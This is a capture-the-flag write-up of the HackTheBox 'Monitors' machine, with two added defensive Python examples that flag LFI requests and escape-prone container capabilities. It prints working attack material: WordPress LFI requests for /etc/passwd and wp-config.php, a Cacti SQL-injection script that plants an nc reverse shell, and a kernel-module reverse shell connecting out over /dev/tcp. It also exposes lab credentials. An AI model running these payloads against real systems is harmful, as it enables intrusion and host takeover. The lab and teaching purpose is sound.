Hackthebox - Monitors

Summary

Monitors was a Hard difficulty Linux box created by TheCyberGeek. The initial foothold was a vulnerable WordPress plugin with an LFI, which we use to read the Apache process's file descriptors and so its logs. The logs reveal a new virtual host (Host header) on the box for Cacti, and the same LFI lets us read wp-config.php, which contains database credentials. Spraying those credentials shows they are also the admin credentials for Cacti. Checking the Cacti version for exploits, we find it is vulnerable to an SQL injection that can be turned into RCE, which gets us a shell on the box as www-data. Enumerating the box we find a service started from the crontab, and following it we find the credentials of the box's user. Enumerating as marcus, we see a note.txt in his home directory; following that hint we find an unusual service listening only on localhost. Port forwarding it, we discover it is Apache OFBiz. A Metasploit module for OFBiz gives us a root shell in a Docker container. Enumerating there, we see we have the CAP_SYS_MODULE capability, and following the HackTricks Docker escape we get a root shell on the box.

Initial Enumeration

nmap

# Nmap 7.91 scan initiated Sun Apr 25 15:57:04 2021 as: nmap -sC -sV -oN nmap/monitors 10.129.7.173
Nmap scan report for 10.129.7.173
Host is up (0.17s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ba:cc:cd:81:fc:91:55:f3:f6:a9:1f:4e:e8:be:e5:2e (RSA)
| 256 69:43:37:6a:18:09:f5:e7:7a:67:b8:18:11:ea:d7:65 (ECDSA)
|_ 256 5d:5e:3f:67:ef:7d:76:23:15:11:4b:53:f8:41:3a:94 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 25 15:57:19 2021 -- 1 IP address (1 host up) scanned in 15.69 seconds

Let's start with web enumeration.

Direct IP access is not allowed, and the error page shows the e-mail admin@monitor.htb, so we add monitor.htb to our hosts file and open the page again.

Wordpress

Opening monitor.htb we see that it is a WordPress website.

Let's enumerate it further with wpscan and manually.

$ wpscan --url "http://monitor.htb"
<SNIP>
Plugin(s) Identified:

wp-with-spritz
| Location: http://monitor.htb/wp-content/plugins/wp-with-spritz/
| Latest Version: 1.0 (up to date)
| Last Updated: 2015-08-20T20:15:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 4.2.4 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://monitor.htb/wp-content/plugins/wp-with-spritz/readme.txt

<SNIP>

We see one plugin installed. Searching for exploits for it turns up spritz-exploit (LFI/RFI).

Testing whether this install is vulnerable:

$ curl http://monitor.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
<SNIP>
marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
<SNIP>
$ curl -s http://monitor.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../../proc/self/cmdline -o cmdline;strings cmdline
/usr/sbin/apache2
start

Checking /proc/self/cmdline we see that the script runs inside an Apache process.

Let's try to get the site config:

$ curl -s http://monitor.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../..//etc/apache2/sites-available/monitor.htb.conf
<VirtualHost *:80>
ServerAdmin admin@monitor.htb
ServerName monitor.htb
ServerAlias monitor.htb
DocumentRoot /var/www/wordpress
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

Let's try to get the wp-config.php file:

$ curl http://monitor.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../../var/www/wordpress/wp-config.php
<SNIP>
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'wpadmin' );

/** MySQL database password */
define( 'DB_PASSWORD', 'BestAdministrator@2020!' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
<SNIP>

Let's enumerate /proc/self/fd/ to find any interesting file descriptors:

$ ffuf -fw 1 -w nums -u "http://monitor.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../../proc/self/fd/FUZZ"
<SNIP>

7 [Status: 200, Size: 2314, Words: 228, Lines: 12]
10 [Status: 200, Size: 247276, Words: 17263, Lines: 1919]
<SNIP>
$ curl http://monitor.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../../proc/self/fd/7
<SNIP>
[Thu Feb 04 14:15:23.408966 2021] [php7:error] [pid 43318] [client 10.10.14.2:45172] script '/usr/share/cacti/user_admin.php' not found or unable to stat
[Thu Feb 04 14:15:31.538925 2021] [php7:error] [pid 43324] [client 10.10.14.2:45174] script '/usr/share/cacti/user_admin.php' not found or unable to stat
[Thu Feb 04 14:16:08.699032 2021] [php7:error] [pid 43312] [client 10.10.14.2:45180] script '/usr/share/cacti/user_admin.php' not found or unable to stat
[Thu Feb 04 14:17:03.865183 2021] [php7:error] [pid 43323] [client 10.10.14.2:45182] script '/usr/share/cacti/user_admin.php' not found or unable to stat
[Thu Feb 04 14:17:35.147503 2021] [php7:error] [pid 41798] [client 10.10.14.2:45184] script '/usr/share/cacti/user_admin.php' not found or unable to stat

This looks like the Apache error.log.

Similarly, checking fd 10:

curl http://monitor.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../../proc/self/fd/10
<SNIP>
192.168.1.14 - - [11/Nov/2020:12:24:27 +0000] "GET /cacti/include/js/jstree.js?c1599db7e1aea82d8fe000823bb3aa6b HTTP/1.1" 200 62964
192.168.1.14 - - [11/Nov/2020:12:24:27 +0000] "GET /cacti/include/js/c3.js?4475647e3aea91584750d4726c065ccd HTTP/1.1" 200 65378
192.168.1.14 - - [11/Nov/2020:12:24:27 +0000] "GET /cacti/include/js/d3.js?6db1c8feb22917c88023d14370218d26 HTTP/1.1" 200 120144
192.168.1.14 - - [11/Nov/2020:12:24:27 +0000] "GET /cacti/include/js/Chart.js?ae4cd3db34d0ea7ea1a9596d5d4120e6 HTTP/1.1" 200 97184
192.168.1.14 - - [11/Nov/2020:12:24:28 +0000] "GET /cacti/images/cacti_logo.svg HTTP/1.1" 200 17295
192.168.1.14 - - [11/Nov/2020:12:24:28 +0000] "GET /cacti/include/themes/modern/images/cacti_logo.gif HTTP/1.1" 200 5891

Let's also get the Apache configuration for cacti-admin.monitor.htb:

curl -s http://monitor.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../..//etc/apache2/sites-available/cacti-admin.monitor.htb.conf | grep -v "#"
<VirtualHost *:80>

ServerAdmin admin@monitor.htb
ServerName cacti-admin.monitor.htb
DocumentRoot /usr/share/cacti
ServerAlias cacti-admin.monitor.htb


ErrorLog /var/log/cacti-error.log
CustomLog /var/log/cacti-access.log common

</VirtualHost>
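As an added example that is not part of the original write-up, the following Python script shows how the LFI activity above looks from the defender's side: it parses Apache combined-format access log lines and flags requests to the spritz plugin whose url= parameter carries traversal sequences, sensitive paths such as /proc/self/fd or wp-config.php, or a remote URL / stream wrapper. The log lines are constructed to mirror the requests in this write-up.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache "combined" format; the client IP and plugin
# path mirror this write-up, but the lines are not taken from the box's real log.
SAMPLE_LOG = """\
10.10.14.12 - - [25/Apr/2021:16:02:11 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../../etc/passwd HTTP/1.1" 200 1843 "-" "curl/7.74.0"
10.10.14.12 - - [25/Apr/2021:16:03:40 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../../proc/self/fd/7 HTTP/1.1" 200 2314 "-" "curl/7.74.0"
192.168.1.14 - - [11/Nov/2020:12:24:27 +0000] "GET /cacti/include/js/c3.js?4475647e3aea91584750d4726c065ccd HTTP/1.1" 200 65378 "-" "Mozilla/5.0"
10.10.14.12 - - [25/Apr/2021:16:10:05 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http%3A%2F%2Fexample.com%2Fx HTTP/1.1" 200 512 "-" "curl/7.74.0"
"""

# Client IP, timestamp, request target and status from a combined-format entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
SPRITZ_PATH = "/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php"
SENSITIVE = ("/etc/passwd", "/proc/self/", "wp-config.php", "/etc/apache2/")
WRAPPERS = ("http://", "https://", "ftp://", "php://", "data:", "expect://")


def classify(url_param):
    """Return why a spritz url= value is suspicious, or None if it looks benign."""
    value = unquote(url_param)  # parse_qs decoded once; this also catches double encoding
    if "../" in value or "..\\" in value:
        return "path traversal"
    if any(marker in value for marker in SENSITIVE):
        return "local file read"
    if value.lower().startswith(WRAPPERS):
        return "remote include / stream wrapper"
    return None


def find_spritz_abuse(log_text):
    """Scan combined-format log text and return one dict per abusive spritz request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if parts.path != SPRITZ_PATH:
            continue
        for value in parse_qs(parts.query).get("url", []):
            reason = classify(value)
            if reason:
                hits.append({"ip": m["ip"], "time": m["ts"], "status": m["status"],
                             "url": unquote(value), "reason": reason})
    return hits
```

Running find_spritz_abuse over a real access.log would surface every /proc/self/fd and wp-config.php read of the kind shown above, which is the signal to block the plugin and rotate the database password it exposed.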

Cacti

Login

Googling for an exploit we see:

Checking the GitHub issue and following its instructions.

This part is the unintended way to get the shell (using nc).

Set the payload

Trigger the payload

This gets us a shell as www-data.

Script

#!/bin/bash
COOKIE='5bbclmftvkdlqj0q337ps0kpqc'   # session cookie of the logged-in Cacti admin
IP="10.10.14.12"
PORT="9000"
# Stacked SQL injection in color.php: the UNION dumps user_auth, the UPDATE stores the
# nc command in the path_php_binary setting.
URL="http://cacti-admin.monitor.htb/cacti/color.php?action=export&header=false&filter=1')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+settings+set+value=\'rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+$IP+$PORT+>/tmp/f;\'+where+name=\'path_php_binary\';--"

echo "Setting Payload"
curl -i -s -k -X 'GET' -H 'Host: cacti-admin.monitor.htb' -b "Cacti=$COOKIE; cross-site-cookie=bar" "$URL"
# The reindex action runs the configured "PHP binary", which triggers the stored command.
curl -i -s -k -X 'GET' -H 'Host: cacti-admin.monitor.htb' -b "Cacti=$COOKIE; cross-site-cookie=bar" 'http://cacti-admin.monitor.htb/cacti/host.php?action=reindex'

WWW-Data -> Marcus

Checking the linpeas output

we see that www-data has a cron job.

Checking the service it runs, we find the file /home/marcus/.backup/backup.sh:

#!/bin/bash

backup_name="cacti_backup"
config_pass="VerticalEdge2020"

zip /tmp/${backup_name}.zip /usr/share/cacti/cacti/*
sshpass -p "${config_pass}" scp /tmp/${backup_name} 192.168.1.14:/opt/backup_collection/${backup_name}.zip
rm /tmp/${backup_name}.zip

Using that password for marcus gets us user.

Marcus -> Root(Container)

Checking note.txt in marcus's home directory:

marcus@monitor:~$ cat note.txt
TODO:

Disable phpinfo in php.ini - DONE
Update docker image for production use -

Checking open ports with netstat -pnutl | grep LISTEN we see that port 8443 is listening on localhost only.

So I port forwarded it using:

$ sshpass -p 'VerticalEdge2020' ssh -L 8443:127.0.0.1:8443 marcus@monitor.htb

Opening the page in a browser we get a 404,

but checking the certificate we see a hint: ofbiz in the certificate name.

From this I googled around for an OFBiz exploit and found one in Metasploit.

Using it I got a shell in the container.

Docker Escape

Checking the Linux capabilities on the box with capsh --print we see that we have CAP_SYS_MODULE:

$ capsh --print

Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Securebits: 00/0x0/1'b0
secure-noroot: no (unlocked)
secure-no-suid-fixup: no (unlocked)
secure-keep-caps: no (unlocked)
uid=0(root)
gid=0(root)
groups=
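As an added example, not part of the original write-up, here is how an auditor can turn the capsh output above into an automated check: it decodes the CapEff mask from /proc/<pid>/status, flags the capabilities that let root inside a container reach the host, and computes the mask the same container would have after `docker run --cap-drop SYS_MODULE`. The status excerpt is constructed; its mask encodes exactly the fifteen capabilities listed above (Docker's default set plus cap_sys_module).

```python
# Capability names in the order defined by <linux/capability.h> (tuple index = bit number).
CAP_NAMES = (
    "chown", "dac_override", "dac_read_search", "fowner", "fsetid", "kill", "setgid",
    "setuid", "setpcap", "linux_immutable", "net_bind_service", "net_broadcast",
    "net_admin", "net_raw", "ipc_lock", "ipc_owner", "sys_module", "sys_rawio",
    "sys_chroot", "sys_ptrace", "sys_pacct", "sys_admin", "sys_boot", "sys_nice",
    "sys_resource", "sys_time", "sys_tty_config", "mknod", "lease", "audit_write",
    "audit_control", "setfcap", "mac_override", "mac_admin", "syslog", "wake_alarm",
    "block_suspend", "audit_read", "perfmon", "bpf", "checkpoint_restore",
)
# Capabilities that let root inside a container act on the host kernel or other namespaces.
ESCAPE_RISK = {
    "cap_sys_module": "can load kernel modules: code runs in the host kernel, outside the container",
    "cap_sys_admin": "can mount filesystems and abuse cgroup release_agent",
    "cap_sys_ptrace": "can attach to host processes when the pid namespace is shared",
    "cap_dac_read_search": "can read arbitrary host files via open_by_handle_at",
}
# Constructed /proc/self/status excerpt (not captured from the box). 0xa80525fb is
# Docker's default capability set 0xa80425fb with bit 16 (cap_sys_module) added.
SAMPLE_STATUS = ("Name:\tbash\nUid:\t0\t0\t0\t0\nCapPrm:\t00000000a80525fb\n"
                 "CapEff:\t00000000a80525fb\nCapBnd:\t00000000a80525fb\n")


def parse_cap_eff(status_text):
    """Return the effective capability mask from /proc/<pid>/status text."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return int(line.split()[1], 16)
    raise ValueError("CapEff line not found")


def decode_caps(mask):
    """Translate a capability bitmask into capsh-style names, e.g. {'cap_chown', ...}."""
    return {"cap_" + name for bit, name in enumerate(CAP_NAMES) if mask >> bit & 1}


def drop_caps(mask, names):
    """Return the mask with the given capabilities cleared, as --cap-drop would leave it."""
    for name in names:
        bare = name[4:] if name.startswith("cap_") else name
        mask &= ~(1 << CAP_NAMES.index(bare))
    return mask


def escape_risks(status_text):
    """Map each present escape-relevant capability to why it matters."""
    present = decode_caps(parse_cap_eff(status_text))
    return {name: why for name, why in ESCAPE_RISK.items() if name in present}
```

The same check run on the host against every container's init process (/proc/<pid>/status as seen from the host) catches images that were started with --cap-add or --privileged before anyone inside them notices.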

Checking HackTricks we see that CAP_SYS_MODULE can be used to escape Docker, so I uploaded the Makefile

obj-m += reverse-shell.o

all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

and the module source

#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");

char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/10.10.14.12/9000 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };

// call_usermodehelper function is used to create user mode processes from kernel space
static int __init reverse_shell_init(void) {
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

static void __exit reverse_shell_exit(void) {
printk(KERN_INFO "Exiting\n");
}

module_init(reverse_shell_init);
module_exit(reverse_shell_exit);

and ran make followed by insmod reverse-shell.ko,

which gets us a shell as root on the host.

And we have pwned the box.

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/monitors/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.